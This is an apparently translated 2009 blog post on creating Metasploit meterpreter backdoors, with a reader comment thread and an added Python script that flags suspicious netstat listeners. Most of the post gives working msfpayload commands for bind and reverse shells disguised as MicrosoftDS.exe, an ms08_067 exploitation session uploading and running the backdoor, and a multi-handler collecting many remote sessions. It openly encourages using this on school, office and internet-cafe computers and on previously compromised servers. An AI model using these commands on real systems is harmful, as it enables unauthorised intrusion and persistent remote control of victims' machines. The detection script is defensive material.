Metasploit to backdooring

Posted by fitri-ariyanto on Monday, May 11, 2009

Some parts of Metasploit can already be used to create a backdoor.
Such a backdoor is very useful, especially as a post-exploitation method. In this example we will use the two basic methods for getting a shell from the target, namely bind_tcp and reverse_tcp.
With bind_tcp, the backdoor running on the target opens a port on the target system itself. Once the exploitation process is complete, we can get into the target at any time by using the port that the backdoor has opened.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread


The backdoor will open port 4321 on the target 10.10.96.143. To get our backdoor running, it can be planted and executed after the exploitation of the target is complete, as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.


Next time, we can get into the target machine without exploiting it again, simply by opening a connection to the port defined above.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >



The second method uses a reverse shell. A reverse shell is used especially when the target network is restricted by a firewall, so that we cannot open a connection to any port on the target (typical of an internal network). So if you have the opportunity to hack a machine in an internal network (e.g. a school computer, an office computer, an internet cafe computer, etc.) and still want shell access at any time and from anywhere, you can take advantage of Metasploit's multi-handler to accept the reverse shell. We can set up the multi-handler on a machine that is reachable from anywhere on the internet, for example a hosting machine, a server that was itself compromised earlier, etc.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..


Then create a backdoor of the reverse-shell type:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


And when it is run (either through the post-exploitation session or manually by double-clicking it with the mouse), the following will appear on the multi-handler:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >


Nice: using Metasploit's multi-handler we can have multiple sessions at once. In the example above, a multi-handler with ExitOnSession set to false can handle many reverse shells at the same time, and we can interact with any of these sessions whenever we want:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows XP (Build 2600, ).

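From the defender's side, the two backdoor styles shown above leave two distinct traces on the victim host: a new TCP listener on an unexpected port (bind_tcp, port 4321) and an established TCP connection to a remote port 53 from a process that is not the system resolver (reverse_tcp disguised as DNS). The following script is an added example, not part of the original post or of Metasploit: it parses lines in the shape of `netstat -ano` output and flags both patterns. The port allowlist, the resolver process name, the PID-to-process map and the netstat sample are all constructed assumptions.

```python
"""Flag netstat rows matching the bind_tcp and reverse_tcp backdoor styles.

Added example (not from the original post). Input is constructed text in the
shape of Windows `netstat -ano` output plus a PID->process map; both are
assumptions, not real captures.
"""
import re

LISTEN_ALLOW = {135, 139, 445}   # assumption: ports a plain Windows XP box exposes
DNS_PROCS = {"svchost.exe"}       # assumption: the only process that should talk to port 53

# Constructed sample resembling `netstat -ano` on the victim; not real data.
NETSTAT = """\
  TCP    0.0.0.0:135          0.0.0.0:0              LISTENING       764
  TCP    0.0.0.0:445          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4321         0.0.0.0:0              LISTENING       2348
  TCP    10.10.96.143:4831    222.124.199.76:53      ESTABLISHED     2412
  TCP    10.10.96.143:1043    10.10.96.1:80          ESTABLISHED     1300
"""
# Constructed PID -> image name map (what `tasklist` would give you).
PROCS = {764: "svchost.exe", 4: "System", 2348: "MicrosoftDS.exe",
         2412: "MicrosoftDS.exe", 1300: "iexplore.exe"}

# One TCP row: local addr:port, remote addr:port, state, owning PID.
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def parse(text):
    """Yield (laddr, lport, raddr, rport, state, pid) for each TCP row."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            yield (m.group(1), int(m.group(2)), m.group(3), int(m.group(4)),
                   m.group(5), int(m.group(6)))


def find_suspicious(text, procs, listen_allow=LISTEN_ALLOW, dns_procs=DNS_PROCS):
    """Return (reason, pid, process, endpoint) tuples for rows worth a look."""
    hits = []
    for laddr, lport, raddr, rport, state, pid in parse(text):
        name = procs.get(pid, "?")
        if state == "LISTENING" and lport not in listen_allow:
            hits.append(("unexpected-listener", pid, name, f"{laddr}:{lport}"))
        elif state == "ESTABLISHED" and rport == 53 and name not in dns_procs:
            hits.append(("tcp53-from-non-resolver", pid, name, f"{raddr}:{rport}"))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(NETSTAT, PROCS):
        print(hit)
```

On the constructed sample this reports the 4321 listener and the TCP/53 connection, both owned by MicrosoftDS.exe, while the normal listeners and the web connection pass.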

Those are a few examples of backdooring with Metasploit; other creative kids will have many more, especially the ones with evil in mind. Oh yes, in the examples above I used the meterpreter payload many times. The discussion of meterpreter will come next.
-----
thanks to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id


manshoezz said...

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.

Can you explain that???

fitri-ariyanto said...

Exploit completed, but no session was created.

This means: so unlucky, man.. haha, try another target